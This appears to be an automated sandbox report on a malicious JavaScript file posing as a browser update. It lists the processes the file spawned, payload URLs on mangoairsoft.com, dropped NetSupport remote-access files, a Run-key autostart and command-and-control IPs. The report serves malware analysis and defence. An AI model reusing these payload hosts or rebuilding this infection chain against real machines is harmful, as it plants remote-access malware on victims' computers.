cmd.exe 1 21->32         started        34 reg.exe 1 21->34         started        48 3 other processes 21->48 36 curl.exe 1 24->36         started        39 reg.exe 1 1 24->39         started        41 reg.exe 1 24->41         started        43 curl.exe 2 26->43         started        46 curl.exe 2 28->46         started        process11 dnsIp12 50 7zz.exe 26 30->50         started        53 client32.exe 18 32->53         started        72 mangoairsoft.com 36->72 74 mangoairsoft.com 43->74 70 C:\ProgramData\7zz.exe, PE32 43->70 dropped 76 mangoairsoft.com 46->76 file13 process14 dnsIp15 62 C:\ProgramData\remcmdstub.exe, PE32 50->62 dropped 64 C:\ProgramData\putty.exe, PE32+ 50->64 dropped 66 C:\ProgramData\pcicapi.dll, PE32 50->66 dropped 68 6 other files (1 malicious) 50->68 dropped 78 94.158.247.23, 49710, 5050 MIVOCLOUDMD Moldova Republic of 53->78 80 geography.netsupportsoftware.com 51.142.119.24, 49711, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United Kingdom 53->80 82 geo.netsupportsoftware.com 53->82 file16

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Browser_update16.0.5836.js5%ReversingLabs
                                Browser_update16.0.5836.js7%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\7zz.exe0%ReversingLabs
                                C:\ProgramData\HTCTL32.DLL3%ReversingLabs
                                C:\ProgramData\PCICHEK.DLL5%ReversingLabs
                                C:\ProgramData\PCICL32.DLL5%ReversingLabs
                                C:\ProgramData\TCCTL32.DLL3%ReversingLabs
                                C:\ProgramData\client32.exe12%ReversingLabs
                                C:\ProgramData\msvcr100.dll0%ReversingLabs
                                C:\ProgramData\pcicapi.dll3%ReversingLabs
                                C:\ProgramData\putty.exe0%ReversingLabs
                                C:\ProgramData\remcmdstub.exe3%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                SourceDetectionScannerLabelLink
                                mangoairsoft.com3%VirustotalBrowse
                                magydostravel.com8%VirustotalBrowse

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.pci.co.uk/support0%URL Reputationsafe
                                http://www.pci.co.uk/support0%URL Reputationsafe
                                https://sectigo.com/CPS00%URL Reputationsafe
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                http://ocsp.sectigo.com00%URL Reputationsafe
                                http://www.pci.co.uk/supportsupport0%URL Reputationsafe
                                http://ocsp.thawte.com00%URL Reputationsafe
                                http://ocsp.thawte.com00%URL Reputationsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                                http://127.0.0.1RESUMEPRINTING0%URL Reputationsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?1691730%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe10%VirustotalBrowse
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?10%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat0%Avira URL Cloudsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6eqG0%Avira URL Cloudsafe
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0%URL Reputationsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-o0%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe100%Avira URL Cloudmalware
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z100%Avira URL Cloudmalware
                                https://mangoairsoft.com/05e2f56dd5d8c0%Avira URL Cloudsafe
                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://mangoairsoft.com/0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-0%Avira URL Cloudsafe
                                http://94.158.247.23/fakeurl.htm100%Avira URL Cloudmalware
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exep0%Avira URL Cloudsafe
                                https://magydostravel.com/cdn/zwmrqqgqnaww.php100%Avira URL Cloudmalware
                                https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php100%Avira URL Cloudmalware
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7zq0%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf2500%Avira URL Cloudsafe
                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e0%Avira URL Cloudsafe
                                https://magydostravel.com/100%Avira URL Cloudmalware

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geography.netsupportsoftware.com
                                		51.142.119.24
                                		truefalse
                                  		high
                                  magydostravel.com
                                  		185.9.147.166
                                  		truetrueunknown
                                  mangoairsoft.com
                                  		188.127.230.147
                                  		truetrueunknown
                                  geo.netsupportsoftware.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exetrue
                                    • 10%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                      		high
                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?169173true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.battrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7ztrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://94.158.247.23/fakeurl.htmtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.netsupportsoftware.com7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drfalse
                                        		high
                                        http://www.pci.co.uk/support7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://%s/testpage.htmwininet.dll7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://sectigo.com/CPS07zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl07zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                          		high
                                          http://ocsp.sectigo.com07zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.pci.co.uk/supportsupport7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?1wscript.exe, 00000000.00000002.512087442.0000022C1F20B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.511860667.0000022C1F1D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510525049.0000022C213ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://ocsp.thawte.com07zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://127.0.0.1RESUMEPRINTING7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                          • URL Reputation: safe
                                          		low
                                          https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6eqGwscript.exe, 00000000.00000002.513263413.0000022C21DF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://%s/testpage.htm7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://127.0.0.17zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-ocurl.exe, 00000008.00000002.490233101.000001F7F5A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://mangoairsoft.com/05e2f56dd5d8cwscript.exe, 00000000.00000002.512657860.0000022C213ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510525049.0000022C213ED000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.symauth.com/cps0(7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drfalse
                                            		high
                                            https://mangoairsoft.com/wscript.exe, 00000000.00000002.512657860.0000022C213D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510525049.0000022C213D6000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/07zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://%s/fakeurl.htm7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.drfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-curl.exe, 00000006.00000002.487264023.000001F4A3DB7000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-curl.exe, 00000004.00000002.483301000.0000020D556C7000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.thawte.com/ThawteTimestampingCA.crl07zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drfalse
                                              		high
                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://magydostravel.com/cdn/zwmrqqgqnaww.phpCacheURL.dat.15.drtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.symauth.com/rpa007zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drfalse
                                                		high
                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7zqcurl.exe, 00000004.00000003.483112123.0000020D556E2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.483045639.0000020D556DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.483335654.0000020D556FA000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exepcurl.exe, 00000006.00000003.486952939.000001F4A3DD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.486824058.000001F4A3DD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.487305923.000001F4A3DEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250wscript.exe, 00000000.00000003.510355916.0000022C20F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510381436.0000022C1F47C000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6ewscript.exe, 00000000.00000003.475186121.0000022C217A3000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.netsupportschool.com/tutor-assistant.asp11(L7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                                  		high
                                                  http://www.netsupportschool.com/tutor-assistant.asp7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drfalse
                                                    		high
                                                    https://magydostravel.com/wscript.exe, 00000000.00000003.475504946.0000022C1F21D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.475822396.0000022C1F21D000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    188.127.230.147
                                                    		mangoairsoft.comRussian Federation
                                                    		56694DHUBRUtrue
                                                    185.9.147.166
                                                    		magydostravel.comRussian Federation
                                                    		56694DHUBRUtrue
                                                    94.158.247.23
                                                    		unknownMoldova Republic of
                                                    		39798MIVOCLOUDMDtrue
                                                    51.142.119.24
                                                    		geography.netsupportsoftware.comUnited Kingdom
                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                    General Information

                                                    Joe Sandbox Version:38.0.0 Beryl
                                                    Analysis ID:1284202
                                                    Start date and time:2023-08-02 10:15:21 +02:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 17m 19s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:23
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • GSI enabled (Javascript)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:Browser_update16.0.5836.js
                                                    Detection:MAL
                                                    Classification:mal92.troj.evad.winJS@40/37@6/4
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 18.1% (good quality ratio 18%)
                                                    • Quality average: 79.4%
                                                    • Quality standard deviation: 21.9%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 64
                                                    • Number of non-executed functions: 91
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .js
                                                    • Override analysis time to 240s for JS/VBS files not yet terminated

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): WMIADAP.exe
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    10:16:17API Interceptor2x Sleep call for process: wscript.exe modified
                                                    10:16:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CachedX C:\ProgramData\client32.exe
                                                    10:16:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CachedX C:\ProgramData\client32.exe

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    188.127.230.147Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                      185.9.147.166http://itsdigitalshiva.comGet hashmaliciousUnknownBrowse
                                                        94.158.247.23Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                        • http://94.158.247.23/fakeurl.htm
                                                        51.142.119.245r5RuD1r4x.exeGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        EN-localer.htaGet hashmaliciousCobalt Strike, NetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        mitljPgJ0K.exeGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        PurchaseOrder.exeGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        a6PzqKcp6K.exeGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        Browser_update.jsGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        rechn1831.jsGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        auf1536.jsGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        tkssm902.jsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        tkssm1523.jsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        Notice_13_jun_2108986.jsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        readme.ps1Get hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        empl1450.jsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        empl1077.jsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        tnss1952.jsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        148428995.jsGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        TRX326326.jsGet hashmaliciousUnknownBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        docse.ps1Get hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        geography.netsupportsoftware.comChrome_update.jsGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        8xW3tocJ6B.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        5r5RuD1r4x.exeGet hashmaliciousUnknownBrowse
                                                        • 51.142.119.24
                                                        jqCED7njWa.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.8
                                                        EN-localer.htaGet hashmaliciousCobalt Strike, NetSupport RATBrowse
                                                        • 51.142.119.24
                                                        RNdbR3uRmZ.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        local-EN.htaGet hashmaliciousCobalt Strike, NetSupport RATBrowse
                                                        • 62.172.138.67
                                                        shdeulerinstall.lnkGet hashmaliciousNetSupport RATBrowse
                                                        • 62.172.138.67
                                                        BP6R1D2cOd.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.8
                                                        bRGk8rpf6M.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        tqWIHaQ2EZ.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        mitljPgJ0K.exeGet hashmaliciousUnknownBrowse
                                                        • 51.142.119.24
                                                        sq36TjF9Sk.exeGet hashmaliciousNymaimBrowse
                                                        • 62.172.138.67
                                                        yOUWkF8AHi.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        Ae8DId1ZVs.exeGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.8
                                                        tUUPQygorhzFkIcHuB.batGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.67
                                                        h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                        • 62.172.138.8
                                                        PurchaseOrder.exeGet hashmaliciousUnknownBrowse
                                                        • 51.142.119.24
                                                        a6PzqKcp6K.exeGet hashmaliciousUnknownBrowse
                                                        • 51.142.119.24

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        DHUBRUChrome_update.jsGet hashmaliciousUnknownBrowse
                                                        • 188.127.230.147
                                                        Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                        • 152.89.218.150
                                                        Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                        • 152.89.218.150
                                                        http://itsdigitalshiva.comGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        https://altiordp.com/cdn-js/wds.min.phpGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.232
                                                        tUUPQygorhzFkIcHuB.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        2_1.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        2.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.231
                                                        KjMLNNlbSwRjEriciGnpqBNGGsSj.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.231
                                                        sett.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.231
                                                        h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        2.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        sett.batGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
